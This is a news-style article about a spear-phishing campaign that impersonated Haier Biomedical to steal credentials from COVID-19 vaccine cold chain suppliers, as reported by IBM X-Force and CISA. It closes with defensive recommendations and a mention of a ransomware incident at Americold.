Advisory on Global Phishing Campaigns Targeting COVID-19 Vaccine Cold Chain Companies

The Cybersecurity Infrastructure and Security Agency has published a warning regarding a worldwide spear phishing campaign directed at companies supplying cold storage and are engaged with COVID-19 vaccine distribution.

The first two vaccines developed should be stored and transported at low temperatures before administering. The Pfizer/BioNTech vaccine should be stored at -94°F (-70°C) while the Moderna vaccine should be stored at -4°F (-20°C). Therefore cold chain suppliers are an important component of the supply chain.

At the beginning of the pandemic, IBM X-Force organized a cyber threat task force to monitor threats directed at companies engaged in fighting against COVID-19. The task force lately shared a report regarding a continuous spear-phishing campaign that began in September 2020 that is focusing on companies involved in the Cold Chain Equipment Optimization Platform program. The United Nations Children’s Fund and partner agencies introduced the program in 2015 to deliver vaccines around the world.

Phishing emails were dispatched to managers in sales, purchasing, finance, and information technology who are probably engaged in work assisting the vaccine cold chain. Targeted companies are considered suppliers of material resources to satisfy the transport requirements of the COVID-19 cold chain.

The phishing emails seem to be from a Haier Biomedical account manager, a Chinese certified merchant of the Cold Chain Equipment Optimization Platform program. Haier Biomedical is the only company on the planet that offers complete cold chain services, therefore it is being impersonated in the phishing campaigns.

The IBM X-Force researchers intercepted emails with malicious HTML attachments that open and cues the person to key in his/her information to open the file. The snagged credentials are then employed to spy on internal communications regarding the process, methods, and projects to deliver COVID-19 vaccines. When the attackers obtain the credentials, they could move laterally through linked systems, perform cyber surveillance, and steal more data to be used in other attacks.

IBM stated that there are phishing campaigns running in 6 countries and, to date, 10 international organizations had been targeted, including the European Commission’s Directorate-General for Taxation and Customs Union. The targeted organizations belong to varied industry sectors like manufacturing, energy, information technology and software. The researchers could not confirm the extent of the success of the campaigns.

According to the accurate targeting of executives in particular global companies engaged in vaccine storage and transportation and the absence of a distinct path to cash out, the campaign is probably being carried out by a nation-state threat actor. IBM X-Force recommends that cybercriminal agencies would probably not invest the time, funds, and resources into these campaigns targeting a lot of global companies.

IBM X-Force advises companies engaged in the cold storage and transportation chain to take measures to mitigate the threats from phishing such as developing and evaluating incident response programs, sharing and absorbing threat intelligence, evaluating their third-party ecosystems, implementing a zero-trust strategy to security, employing multi-factor authentication throughout the company, utilizing endpoint protection and response solutions, and performing frequent email security awareness training.

Besides the phishing threats, companies engaged in the cold storage chain ought to set up protection against ransomware attacks since they will be a probable target any time. In November, cold storage firm Americold Realty Trust based in the U.S. suffered a cyberattack believed to have involved ransomware. The firm was reported as asking Chicago Rockford international Airport for assistance in the COVID-19 vaccine distribution.